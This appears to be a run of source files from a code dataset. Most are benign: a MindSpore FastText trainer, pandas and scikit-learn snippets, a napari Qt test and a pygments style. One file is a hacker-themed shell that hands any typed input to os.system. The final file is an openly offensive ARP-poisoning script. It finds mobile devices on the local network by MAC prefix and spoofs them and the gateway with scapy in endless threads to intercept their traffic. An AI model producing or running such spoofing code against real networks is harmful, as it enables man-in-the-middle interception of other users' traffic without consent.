'3']\nelif config.data_name == 'dbpedia':\n target_label1 = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']\nelif config.data_name == 'yelp_p':\n target_label1 = ['0', '1']\n\nclass LossCallBack(Callback):\n \"\"\"\n Monitor the loss in training.\n\n If the loss is NAN or INF terminating training.\n\n Note:\n If per_print_times is 0 do not print loss.\n\n Args:\n per_print_times (int): Print loss every times. 
Default: 1.\n \"\"\"\n def __init__(self, per_print_times=1, rank_ids=0):\n super(LossCallBack, self).__init__()\n if not isinstance(per_print_times, int) or per_print_times < 0:\n raise ValueError(\"print_step must be int and >= 0.\")\n self._per_print_times = per_print_times\n self.rank_id = rank_ids\n global time_stamp_init, time_stamp_first\n if not time_stamp_init:\n time_stamp_first = get_ms_timestamp()\n time_stamp_init = True\n\n def step_end(self, run_context):\n \"\"\"Monitor the loss in training.\"\"\"\n global time_stamp_first\n time_stamp_current = get_ms_timestamp()\n cb_params = run_context.original_args()\n print(\"time: {}, epoch: {}, step: {}, outputs are {}\".format(time_stamp_current - time_stamp_first,\n cb_params.cur_epoch_num,\n cb_params.cur_step_num,\n str(cb_params.net_outputs)))\n with open(\"./loss_{}.log\".format(self.rank_id), \"a+\") as f:\n f.write(\"time: {}, epoch: {}, step: {}, loss: {}\".format(\n time_stamp_current - time_stamp_first,\n cb_params.cur_epoch_num,\n cb_params.cur_step_num,\n str(cb_params.net_outputs.asnumpy())))\n f.write('\\n')\n\n\nclass FastTextInferExportCell(nn.Cell):\n \"\"\"\n Encapsulation class of FastText network infer.\n\n Args:\n network (nn.Cell): FastText model.\n\n Returns:\n Tuple[Tensor, Tensor], predicted_ids\n \"\"\"\n def __init__(self, network):\n super(FastTextInferExportCell, self).__init__(auto_prefix=False)\n self.network = network\n self.argmax = P.ArgMaxWithValue(axis=1, keep_dims=True)\n self.log_softmax = nn.LogSoftmax(axis=1)\n\n def construct(self, src_tokens, src_tokens_lengths):\n \"\"\"construct fasttext infer cell\"\"\"\n prediction = self.network(src_tokens, src_tokens_lengths)\n predicted_idx = self.log_softmax(prediction)\n predicted_idx, _ = self.argmax(predicted_idx)\n\n return predicted_idx\n\n\ndef _build_training_pipeline(pre_dataset, run_distribute=False):\n \"\"\"\n Build training pipeline\n\n Args:\n pre_dataset: preprocessed dataset\n \"\"\"\n net_with_loss = FastTextNetWithLoss(config.vocab_size, config.embedding_dims, config.num_class)\n net_with_loss.init_parameters_data()\n if config.pretrain_ckpt_dir:\n parameter_dict = load_checkpoint(config.pretrain_ckpt_dir)\n load_param_into_net(net_with_loss, parameter_dict)\n if pre_dataset is None:\n raise ValueError(\"pre-process dataset must be provided\")\n\n #get learning rate\n update_steps = config.epoch * pre_dataset.get_dataset_size()\n decay_steps = pre_dataset.get_dataset_size()\n rank_size = os.getenv(\"RANK_SIZE\")\n if isinstance(rank_size, int):\n raise ValueError(\"RANK_SIZE must be integer\")\n if rank_size is not None and int(rank_size) > 1:\n base_lr = config.lr\n else:\n base_lr = config.lr / 10\n print(\"+++++++++++Total update steps \", update_steps)\n lr = Tensor(polynomial_decay_scheduler(lr=base_lr,\n min_lr=config.min_lr,\n decay_steps=decay_steps,\n total_update_num=update_steps,\n warmup_steps=config.warmup_steps,\n power=config.poly_lr_scheduler_power), dtype=mstype.float32)\n optimizer = Adam(net_with_loss.trainable_params(), lr, beta1=0.9, beta2=0.999)\n\n net_with_grads = FastTextTrainOneStepCell(net_with_loss, optimizer=optimizer)\n net_with_grads.set_train(True)\n model = Model(net_with_grads)\n loss_monitor = LossCallBack(rank_ids=config.rank_id)\n dataset_size = pre_dataset.get_dataset_size()\n time_monitor = TimeMonitor(data_size=dataset_size)\n ckpt_config = CheckpointConfig(save_checkpoint_steps=decay_steps * config.epoch,\n keep_checkpoint_max=config.keep_ckpt_max)\n callbacks = [time_monitor, loss_monitor]\n 
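    # Descriptive note (inferred from the two branches below): a ModelCheckpoint
    # callback is attached per process on single-device runs, but only on every
    # 8th rank (one saver per 8-device server) when running distributed.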
if not run_distribute:\n ckpt_callback = ModelCheckpoint(prefix='fasttext',\n directory=os.path.join(config.save_ckpt_dir,\n 'ckpt_{}'.format(os.getenv(\"DEVICE_ID\"))),\n config=ckpt_config)\n callbacks.append(ckpt_callback)\n if run_distribute and MultiDevice.get_rank() % 8 == 0:\n ckpt_callback = ModelCheckpoint(prefix='fasttext',\n directory=os.path.join(config.save_ckpt_dir,\n 'ckpt_{}'.format(os.getenv(\"DEVICE_ID\"))),\n config=ckpt_config)\n callbacks.append(ckpt_callback)\n print(\"Prepare to Training....\")\n epoch_size = pre_dataset.get_repeat_count()\n print(\"Epoch size \", epoch_size)\n if run_distribute:\n print(f\" | Rank {MultiDevice.get_rank()} Call model train.\")\n model.train(epoch=config.epoch, train_dataset=pre_dataset, callbacks=callbacks, dataset_sink_mode=False)\n\n\ndef train_single(input_file_path):\n \"\"\"\n Train model on single device\n Args:\n input_file_path: preprocessed dataset path\n \"\"\"\n print(\"Staring training on single device.\")\n preprocessed_data = load_dataset(dataset_path=input_file_path,\n batch_size=config.batch_size,\n epoch_count=config.epoch_count,\n bucket=config.buckets)\n _build_training_pipeline(preprocessed_data)\n\n\ndef set_parallel_env():\n context.reset_auto_parallel_context()\n MultiDevice.init()\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL,\n device_num=MultiDevice.get_group_size(),\n gradients_mean=True)\n\ndef train_paralle(input_file_path):\n \"\"\"\n Train model on multi device\n Args:\n input_file_path: preprocessed dataset path\n \"\"\"\n set_parallel_env()\n print(\"Starting traning on multiple devices. |~ _ ~| |~ _ ~| |~ _ ~| |~ _ ~|\")\n batch_size = config.batch_size\n if config.device_target == 'GPU':\n batch_size = config.distribute_batch_size_gpu\n\n preprocessed_data = load_dataset(dataset_path=input_file_path,\n batch_size=batch_size,\n epoch_count=config.epoch_count,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank(),\n bucket=config.buckets,\n shuffle=False)\n _build_training_pipeline(preprocessed_data, True)\n\n\ndef modelarts_pre_process():\n '''modelarts pre process function.'''\n def unzip(zip_file, save_dir):\n import zipfile\n s_time = time.time()\n if not os.path.exists(os.path.join(save_dir, config.modelarts_dataset_unzip_name)):\n zip_isexist = zipfile.is_zipfile(zip_file)\n if zip_isexist:\n fz = zipfile.ZipFile(zip_file, 'r')\n data_num = len(fz.namelist())\n print(\"Extract Start...\")\n print(\"unzip file num: {}\".format(data_num))\n data_print = int(data_num / 100) if data_num > 100 else 1\n i = 0\n for file in fz.namelist():\n if i % data_print == 0:\n print(\"unzip percent: {}%\".format(int(i * 100 / data_num)), flush=True)\n i += 1\n fz.extract(file, save_dir)\n print(\"cost time: {}min:{}s.\".format(int((time.time() - s_time) / 60),\n int(int(time.time() - s_time) % 60)))\n print(\"Extract Done.\")\n else:\n print(\"This is not zip.\")\n else:\n print(\"Zip has been extracted.\")\n\n if config.need_modelarts_dataset_unzip:\n zip_file_1 = os.path.join(config.data_path, config.modelarts_dataset_unzip_name + \".zip\")\n save_dir_1 = os.path.join(config.data_path)\n\n sync_lock = \"/tmp/unzip_sync.lock\"\n\n # Each server contains 8 devices as most.\n if get_device_id() % min(get_device_num(), 8) == 0 and not os.path.exists(sync_lock):\n print(\"Zip file path: \", zip_file_1)\n print(\"Unzip file save dir: \", save_dir_1)\n unzip(zip_file_1, save_dir_1)\n print(\"===Finish extract data synchronization===\")\n try:\n os.mknod(sync_lock)\n 
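                # note: os.mknod raises FileExistsError (an OSError, aliased as
                # IOError in Python 3) if another device created the lock first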
except IOError:\n pass\n\n while True:\n if os.path.exists(sync_lock):\n break\n time.sleep(1)\n\n print(\"Device: {}, Finish sync unzip data from {} to {}.\".format(get_device_id(), zip_file_1, save_dir_1))\n\n config.save_ckpt_dir = os.path.join(config.output_path, config.save_ckpt_dir)\n\n\n@moxing_wrapper(pre_process=modelarts_pre_process)\ndef run_train():\n '''run train.'''\n config.rank_id = int(os.environ.get(\"RANK_ID\", \"0\"))\n if config.run_distribute:\n train_paralle(config.dataset_path)\n else:\n train_single(config.dataset_path)\n\ndef run_fasttext_export():\n \"\"\"export function\"\"\"\n fasttext_model = FastText(config.vocab_size, config.embedding_dims, config.num_class)\n print(\"================config.ckpt_file===========\")\n ckpt_dir = os.path.join(config.train_url, 'ckpt_{}'.format(os.getenv(\"DEVICE_ID\")))\n config.ckpt_file = os.path.join(ckpt_dir, 'fasttext-5_35.ckpt')\n parameter_dict = load_checkpoint(config.ckpt_file)\n load_param_into_net(fasttext_model, parameter_dict)\n ft_infer = FastTextInferExportCell(fasttext_model)\n batch_size = 1\n if config.data_name == \"ag\":\n src_tokens_shape = [batch_size, 467]\n src_tokens_length_shape = [batch_size, 1]\n elif config.data_name == 'dbpedia':\n src_tokens_shape = [batch_size, 1120]\n src_tokens_length_shape = [batch_size, 1]\n elif config.data_name == 'yelp_p':\n src_tokens_shape = [batch_size, 2955]\n src_tokens_length_shape = [batch_size, 1]\n\n file_name = os.path.join(config.train_url, config.file_name + '_' + config.data_name)\n src_tokens = Tensor(np.ones((src_tokens_shape)).astype(np.int32))\n src_tokens_length = Tensor(np.ones((src_tokens_length_shape)).astype(np.int32))\n export(ft_infer, src_tokens, src_tokens_length, file_name=file_name, file_format='AIR')\n\n\nif __name__ == \"__main__\":\n run_train()\n run_fasttext_export()\n","sub_path":"research/nlp/fasttext/modelarts/train_start.py","file_name":"train_start.py","file_ext":"py","file_size_in_byte":13434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"215265593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport Scripts.git as git\nimport Scripts.nmap as nmap\nimport Scripts.matrix as matrix\nimport Scripts.TextDisplay as TextDisp\nprof = True\nimport Settings\ntry:\n\tos.chdir(os.path.dirname(sys.argv[0]))\nexcept:\n\tprint(\"couldn't nav to correct dir, May be running inside the HTM file\")\ndef YENO(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\nos.system(\"clear\")\nif prof == True:\n\tTextDisp.run()\nelse:\n\tTextDisp.IAmAPussy()\nn = \"\"\nwhile n.strip() != 'exit':\n\tn = raw_input(\"HTM > \")\n\n\tif n == \"matrix\" or n == \"Matrix\":\n\t\tmatrix.run()\n\t\tprint(\"Mainframe Hacked\")\n\telif n == \"modules\":\n\t\tprint(\"\"\"\n\t\tMatrix - Displays a matrix, Makes you look cool\n\t\tnmap - Not Fully Implemented\n\t\tnikto - Not Fully Implemented\n\t\tcmc - Custom command, Allows 
overideing modules\n\t\t\"\"\")\n\telif n == \"git\":\n\t\tgit.run()\n\telif n == \"ls\":\n\t\tos.system(\"ls\")\n\telif n == \"nmap\":\n\t\tnmap.run()\n\telif n == \"cd\":\n\t\ttry:\n\t\t\tos.chdir(raw_input(\"Dir to move to: \"))\n\t\texcept:\n\t\t\tprint(\"Error, Check your path with 'ls'\")\n\n\telif n == \"cmc\":\n\t\tcmc = raw_input(\"Custom Command: \")\n\t\tos.system(cmc)\n\telif n == \"nikto\":\n\t\tos.system(\"python Scripts/nikto.py\")\n\telif n == \"clear\":\n\t\tos.system(\"clear\")\n\t\tTextDisp.run()\n\telif n == \"sqlmap\":\n\t\tos.system(\"python Scripts/SQLmap.py\")\n\telif n == \"TOF\":\n\t\tos.system(\"python Scripts/TOF.py\")\n\telif n == \"Tetris\":\n\t\tos.system(\"python Scripts/Tetris.py\")\n\telse:\n\t\tos.system(n)\n","sub_path":"HTM/HTM.py","file_name":"HTM.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"155402128","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndf=pd.DataFrame({\n \"key1\":[\"a\",\"a\",\"b\",\"b\",\"a\"],\n \"key2\":[\"one\",\"two\",\"one\",\"two\",\"one\"],\n \"data1\":np.random.randn(5),\n \"data2\":np.random.randn(5)\n})\n\n#元祖第一个元素是由键值组\nfor (k1,k2),group in df.groupby([\"key1\",\"key2\"]):\n print(k1,k2)\n print(group)","sub_path":"python_self/数据挖掘/Pandas库/数据分组/遍历分组/迭代多层次的GroupBy对象.py","file_name":"迭代多层次的GroupBy对象.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"599081385","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.naive_bayes import GaussianNB\nimport pickle\n\ndef training():\n def filter_label_tag(label_list):\n if label_list[0] == 1:\n return 'Pouca'\n if label_list[1] == 1:\n return 'Moderada'\n if label_list[2] == 1:\n return 'Nemhuma'\n if label_list[3] == 1:\n return 'Alta'\n\n dataframe = pd.read_csv('Cleaned-Data.csv')\n severity_columns = dataframe.filter(like='Severity_').columns\n\n dataframe['Condition'] = dataframe[severity_columns].values.tolist()\n\n dataframe_list = dataframe.values.tolist()\n\n training_features_list = []\n training_labels_list = []\n correction_features_list = []\n correction_labels_list = []\n index = 0\n\n classifier = GaussianNB()\n\n for data in dataframe_list:\n features_frame = data[0:8]\n label_frame = filter_label_tag(data[27])\n if index < 252800:\n training_features_list.append(features_frame)\n training_labels_list.append(label_frame)\n else:\n correction_features_list.append(features_frame)\n correction_labels_list.append(label_frame)\n index += 1\n\n classifier.fit(training_features_list, training_labels_list)\n\n f = open('my_classifier.pickle', 'wb')\n pickle.dump(classifier, f)\n f.close()","sub_path":"training_model.py","file_name":"training_model.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"408199298","text":"import sys\nimport os \ndir_path = os.path.dirname(os.path.realpath(__file__))\nsrc_path = os.path.join(dir_path[:len(dir_path) - len('sandbox')], 'src')\nsys.path.append(src_path)\n\nimport numpy as np\nimport rl_bot\n\n\n# Fake action_space class\n\nclass ActionSpace(object):\n def sample(self):\n return np.array([0])\n\n\n# Main\n\ndef main():\n bot = rl_bot.TestBot(ActionSpace(), 0.0)\n for i_episode in range(2000):\n # Reset bot and environment\n bot.new_game()\n\n # Play episode\n for t in range(20):\n # Action-Reward 
loop\n action = bot.action(random_observation())\n reward = (-1 * np.sum(action))\n bot.reward(reward)\n\n # Learn from experience\n bot.game_over()\n\n # Has the bot figured it out?\n bot_action = bot.action(random_observation(), True)\n output = np.sum(bot_action)\n\n if i_episode % 20 == 0:\n print ('\\toutput {0}: {1}{2}'.format(str(i_episode).zfill(3), '-' if output < 0 else ' ', round(abs(output), 3)))\n\n if output < -100:\n print ('Bot has learned it! Policy gradients!')\n print ('proved w/ action: {0}'.format(bot_action))\n print ('Learned after {0} episodes'.format(i_episode + 1))\n break\n\n\ndef random_observation():\n # return np.array([1])\n return np.random.rand(2)\n\n\n# Script handle\n\nif __name__ == '__main__':\n main()","sub_path":"sandbox/policy_gradients_test.py","file_name":"policy_gradients_test.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"30924280","text":"# -*- coding: utf-8 -*-\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom generic import GenericRequired\n\n\nclass BalanceRequired(GenericRequired):\n\n def period_start(self):\n success = False\n\n if 'period_start' in getattr(self.request, self._method):\n success = True\n self._params['period_start'] = getattr(self.request, self._method)['period_start']\n else:\n self['title'] = u'Ошибка приложения'\n self['message'] = u'Начальный период не пришёл от frontend'\n\n return success\n\n def period_end(self):\n success = False\n\n if 'period_end' in getattr(self.request, self._method):\n success = True\n self._params['period_end'] = getattr(self.request, self._method)['period_end']\n else:\n self['title'] = u'Ошибка приложения'\n self['message'] = u'Конечный период не пришёл от frontend'\n\n return success\n","sub_path":"backend/lib/required/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"255335937","text":"from typing import Tuple\n\nimport numpy as np\nfrom qtpy.QtCore import QModelIndex, Qt\n\nfrom napari._qt.containers import QtLayerList\nfrom napari.components import LayerList\nfrom napari.layers import Image\n\n\ndef test_set_layer_invisible_makes_item_unchecked(qtbot):\n view, image = make_qt_layer_list_with_layer(qtbot)\n assert image.visible\n assert check_state_at_layer_index(view, 0) == Qt.CheckState.Checked\n\n image.visible = False\n\n assert check_state_at_layer_index(view, 0) == Qt.CheckState.Unchecked\n\n\ndef test_set_item_unchecked_makes_layer_invisible(qtbot):\n view, image = make_qt_layer_list_with_layer(qtbot)\n assert check_state_at_layer_index(view, 0) == Qt.CheckState.Checked\n assert image.visible\n\n view.model().setData(\n layer_to_model_index(view, 0),\n Qt.CheckState.Unchecked,\n Qt.ItemDataRole.CheckStateRole,\n )\n\n assert not image.visible\n\n\ndef make_qt_layer_list_with_layer(qtbot) -> Tuple[QtLayerList, Image]:\n image = Image(np.zeros((4, 3)))\n layers = LayerList([image])\n view = QtLayerList(layers)\n qtbot.addWidget(view)\n return view, image\n\n\ndef layer_to_model_index(view: QtLayerList, layer_index: int) -> QModelIndex:\n return view.model().index(layer_index, 0, view.rootIndex())\n\n\ndef check_state_at_layer_index(\n view: QtLayerList, layer_index: int\n) -> Qt.CheckState:\n model_index = layer_to_model_index(view, layer_index)\n value = view.model().data(model_index, Qt.ItemDataRole.CheckStateRole)\n # The data method 
returns integer value of the enum in some cases, so\n # ensure it has the enum type for more explicit assertions.\n return Qt.CheckState(value)\n","sub_path":"napari/_qt/containers/_tests/test_qt_layer_list.py","file_name":"test_qt_layer_list.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"632950968","text":"from pygments.formatters.terminal256 import Terminal256Formatter\nfrom pygments.style import Style\nfrom pygments.token import (Comment, Error, Generic, Keyword, Name,\n Number, Operator, String)\n\n\n# Hack: pygments requires hex color codes, which will be converted to\n# terminal color code with Terminal256Formatter. I would like to have\n# base16 colors, so I use this to control the color code I will get.\n# Note: it is impossible to get 16 this way. It has the same hex code as\n# 0, so it will never get used. 3 is a good replacement for that.\n_color_table = [\n '#{:02x}{:02x}{:02x}'.format(r, g, b)\n for r, g, b in Terminal256Formatter().xterm_colors\n]\n\n\ndef color(fg=None, bg=None, extra=None):\n s = []\n if fg is not None:\n s.append(_color_table[fg])\n if bg is not None:\n s.append('bg:' + _color_table[bg])\n if extra is not None:\n s.append(extra)\n return ' '.join(s)\n\n\nclass Base16TerminalStyle(Style):\n styles = {\n Comment.Preproc: color(3),\n Comment.Special: color(6),\n Comment: color(8),\n Error: color(1),\n Generic.Error: color(1),\n Generic.Traceback: color(1),\n Keyword.Type: color(3),\n Keyword: color(5),\n Name.Builtin: color(4),\n Name.Decorator: color(5),\n Name.Exception: color(1),\n Name.Function: color(4),\n Number: color(3),\n Operator.Word: color(5),\n String.Escape: color(17),\n String.Interpol: color(17),\n String: color(2),\n }\n","sub_path":"pythonlocal/pygments_style_base16.py","file_name":"pygments_style_base16.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"107990876","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom os import listdir\nfrom os.path import join\nimport functions as f\n\n#Set plot style\nplt.rcParams.update({'font.size': 20})\nfig, ax = plt.subplots(figsize=(8,6))\ndash = '--'\nline = '-'\ncolor = ['r',(0.8,0.52,0),(0.8,0.8,0),(0,0.8,0),'b',(111/255, 0, 255/255),(238/255,130/255,238/255),'k']\n\n#Load Datas\nprint(\"Please input the desired directory:\")\n#path = 'Well_Mixed'\npath = 'TwoLayer'\nDatas = f.Import_Datas(path)\n\n#Main code to plot\nf.Plot_AttCur_Fill(fig, ax, Datas[:int(len(Datas)/2)],'b','dashed',LABEL=\"Dust growth scenario\")\nf.Plot_AttCur_Fill(fig, ax, Datas[int(len(Datas)/2):],'r','solid' ,LABEL=\"Star dust scenario\")\n\n#Plot legends\nExt_SD = np.loadtxt('./Observation_Datas/Extinction_Curve/ext_yenhsing_stellar.dat')\nExt_DG = np.loadtxt('./Observation_Datas/Extinction_Curve/ext_yenhsing_accretion.dat')\nROW = f.Find_Lambda_ROW(0.3, Ext_DG)\nax.plot(1/Ext_DG[:,0],Ext_DG[:,3]/Ext_DG[ROW,3],color='r',linestyle='dashed',label=\"Ext. curve of D.G. scenario\", zorder=2)\nax.plot(1/Ext_SD[:,0],Ext_SD[:,3]/Ext_SD[ROW,3],color='r',linestyle='solid',label=\"Ext. curve of S.D. 
scenario\", zorder=2)\n#f.Plot_Ext()\n\n#Show SMC and Calzetti curves\nSMC = np.loadtxt('./Observation_Datas/pei_smc.dat')\nCalzetti = np.loadtxt('./Observation_Datas/calzetti.dat')\nLine_SMC = ax.plot(SMC[:,0], SMC[:,2]/1.9, color = (0.4,0.4,0.4), linestyle=':', label='SMC extinction curve', linewidth=3, zorder=2)\nLine_Cal = ax.plot(1/Calzetti[:,0], Calzetti[:,1], color = (0.2,0.2,0.2), linestyle=':', label='Calzetti attenuation curve', linewidth=3, zorder=2)\n\n#Show the beta wavelengths\nB_short = ax.vlines(x=1/0.16, ymin=0, ymax=10, colors=(0.8,0.8,0.8), linestyle='solid')\nB_long = ax.vlines(x=1/0.25, ymin=0, ymax=10, colors=(0.8,0.8,0.8), linestyle='solid')\n\nhandles, labels = plt.gca().get_legend_handles_labels()\norder = [4,5,2,3,0,1]\nplt.legend([handles[idx] for idx in order],[labels[idx] for idx in order],loc=2,prop={'size': 15})\n\n\n#Set plot style\n#plt.legend(loc=2,prop={'size': 15})\n#plt.title(\"Attenuation Curve \\n (Normalized at {:4f} $\\mu m$)\".format(Datas[ROW,0]))\nplt.xlabel(r'$1/\\lambda$ $(\\mu m^{-1})$')\nplt.ylabel(r'$A/A_{3000 \\AA}$')\nplt.xlim([0.3,10])\nplt.ylim([0,10])\nplt.tight_layout()\nplt.savefig(str(path+\"_Attcur.png\"),dpi=300)\n#plt.show()\nprint('OK!')\n","sub_path":"plot_att.py","file_name":"plot_att.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"490120337","text":"stopwords = ['데/NNB', '좀/MAG', '수/NNB', '등/NNB']\ndef clean_stopword_text(reviews):\n corpus = []\n for review in reviews:\n modi_sent = []\n for word in str(review).split(' '):\n if word not in stopwords:\n modi_sent.append(word)\n corpus.append(' '.join(modi_sent))\n return corpus\n\n\nimport pandas as pd\nfilepath = '\"./_reviews.csv\"'\ndf = pd.read_csv(filepath)\n\ndf['review'] = clean_stopword_text(df['review'])\ndf.to_csv(\"9\" + filepath, index=False)","sub_path":"pjt2/MechineLearning/etc/etc/tpu/preprocess/9_clean_stopword_text.py","file_name":"9_clean_stopword_text.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"579452998","text":"import sys\nimport os\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import roc_curve, auc\nsys.path.append('/home/ubuntu/fubar')\nfrom cnn_toolkit import contiguous_true_vs_predicted, get_fresh_weights_and_model, filepattern\n\n\ndef roc_curve_data(model,\n positive_class,\n negative_class,\n tts):\n \"\"\"\n saves roc curve data to 3 separate text files (fpr, tpr and thresholds)\n :param model: Model instance implementing predict method\n :param positive_class: string specifying positive class name\n :param negative_class: string specifying negative class name\n :param tts: test pd.DataFrame from file_train_test_split\n :return:\n \"\"\"\n\n y_true, y_pred = contiguous_true_vs_predicted(\n model,\n positive_class,\n negative_class,\n tts=tts\n )\n\n fpr, tpr, thresholds = roc_curve(y_true, y_pred)\n\n print(f'AUC is {auc(fpr, tpr)}')\n\n np.savetxt(filepattern('fpr_', '.txt'), fpr)\n np.savetxt(filepattern('tpr_', '.txt'), tpr)\n np.savetxt(filepattern('thresholds_', '.txt'), thresholds)\n\n\ndef load_roc_curve(fpr_txt=None, tpr_txt=None, thresholds_txt=None):\n\n def sub(arg, strg):\n if arg is None:\n res = np.loadtxt(filepattern(strg, '.txt'))\n else:\n res = np.loadtxt(strg)\n return res\n\n fpr = sub(fpr_txt, 'fpr_')\n tpr = sub(tpr_txt, 'tpr_')\n thresholds = sub(thresholds_txt, 'thresholds_')\n\n 
return fpr, tpr, thresholds\n\n\nif __name__ == '__main__':\n\n cwd = os.getcwd()\n os.chdir('/home/ubuntu/fubar')\n\n m, w = get_fresh_weights_and_model(os.getcwd(), 'model_allfreeze*', 'weights_allfreeze*')\n with open(m, 'r') as f:\n model = tf.keras.models.model_from_json(f.read())\n model.load_weights(w)\n\n _, t = get_fresh_weights_and_model(os.getcwd(), 'train*.csv', 'test*.csv')\n # above function can be also used to get file names of the freshest train and test sets\n test_set = pd.read_csv(t)\n\n roc_curve_data(model, 'locked', 'freelocked', test_set)\n\n os.chdir(cwd)","sub_path":"benchmarks/bench_CLF.py","file_name":"bench_CLF.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"96296405","text":"#!/usr/bin/env python3\n# ARP Poison v2\n\n# import serious stuff\nimport time\nimport netifaces\nimport netaddr\nimport ipaddress\nimport threading\nfrom scapy.all import *\nfrom subprocess import Popen, PIPE\n\nimport pdb # debug\nfrom pprint import pprint # debug\n\n\n# probe interfaces, the new way\ndef probe_interfaces():\n # essential variables\n interface_dict = {}\n\n # list available interfaces and remove loopback\n available_interfaces = netifaces.interfaces()\n available_gateways = netifaces.gateways()[netifaces.AF_INET]\n available_interfaces.remove(\"lo\")\n\n for interface in available_interfaces:\n # get all the information about the interface\n interface_details = netifaces.ifaddresses(interface)\n\n # remove interface if it lacks IPv4 stuff\n if not netifaces.AF_INET in interface_details:\n continue\n\n # get gateway address for interface\n for gateway in available_gateways:\n if interface in gateway:\n gateway = gateway[0]\n\n # extract required information from interface_details\n localhost_address = interface_details[netifaces.AF_INET][0][\"addr\"]\n netmask = interface_details[netifaces.AF_INET][0][\"netmask\"]\n\n # generate network address\n network_address = localhost_address \n network_address = network_address[: network_address.rfind(\".\")]\n network_address += \".0\"\n \n # generate interface information dictionary\n interface_dict.update({interface: {\n \"localhost_address\": localhost_address,\n \"netmask\": netmask,\n \"interface\": interface,\n \"gateway\": gateway,\n \"network_address\": network_address\n }})\n\n return interface_dict\n\n\n# we have our own ping function! 
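# (a hedged reading of the function below: it shells out to `arping -c 1 -w 1`
# on the given interface and parses the replying MAC out of arping's stdout)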
\ndef check_status(ip_address, interface):\n # status dictionary\n status_dict = {\n \"ip_address\": ip_address,\n \"online\": False,\n \"mac\": None\n }\n\n ping = Popen(\n [\"arping\", \"-I\", interface, \"-c\", \"1\", \"-w\", \"1\", str(ip_address)], \n stdout = PIPE\n )\n\n ping_out = ping.communicate()[0].decode()\n ping_out = ping_out.split(\"\\n\")\n \n # returncode is 0 if ping is succesful, converting to bool\n if ping.returncode == 0:\n status_dict[\"online\"] = True\n mac = ping_out[1]\n mac = mac[mac.index(\"m\")+1 : mac.index(\"(\")]\n status_dict[\"mac\"] = mac\n\n print(status_dict) # debug\n return status_dict \n \n\n# get list of live devices on network\ndef generate_device_dict(network_info):\n # essential variables\n online_devices = {}\n\n cidr_address = netaddr.IPNetwork(\n network_info[\"network_address\"],\n network_info[\"netmask\"]\n )\n network = ipaddress.ip_network(cidr_address)\n\n for ip_address in network.hosts():\n device = check_status(ip_address, network_info[\"interface\"])\n if device[\"online\"]:\n online_devices[str(device[\"ip_address\"])] = device[\"mac\"]\n\n return online_devices\n\n\n# generate list of devices to be attacked\ndef generate_target_dict(device_dict):\n # essential variables\n target_dict = {}\n\n # read MAC file\n mac_list = open(\"mobile-mac_only.txt\").read().split(\"\\n\")\n\n # cleanup the MAC file\n while \"\" in mac_list:\n mac_list.pop(mac_list.index(\"\"))\n\n # find mobiles from device_dict\n for device in device_dict:\n for mac in mac_list:\n if device_dict[device].lower().find(mac.lower()) != -1:\n target_dict[device] = device_dict[device]\n\n return target_dict \n\n\n# attack!\ndef poison(gateway, gateway_mac, target, target_mac):\n # specify target details\n poison_target = ARP()\n poison_target.op = 2\n poison_target.psrc = gateway\n poison_target.pdst = target\n poison_target.hwdst = target_mac\n\n # specify gateway details\n poison_gateway = ARP()\n poison_gateway.op = 2\n poison_gateway.psrc = target\n poison_gateway.pdst = gateway\n poison_gateway.hwdst = gateway_mac\n while True:\n send(poison_target)\n send(poison_gateway)\n time.sleep(2)\n\n\n# the main function\ndef main():\n # essential variables\n interface = \"wlp13s0\"\n\n # get info on current interface\n network_info = probe_interfaces()[interface]\n\n # find all devices on network\n device_dict = generate_device_dict(network_info)\n\n # find mobile devices\n target_dict = generate_target_dict(device_dict)\n\n # find gateway info\n gateway = network_info[\"gateway\"]\n gateway_mac = device_dict[gateway]\n\n # attack!\n for target in target_dict:\n poison_thread = threading.Thread(\n target=poison,\n args=[gateway, gateway_mac, target, target_dict[target]]\n )\n poison_thread.start()\n\n\n# run the main function\nif __name__ == 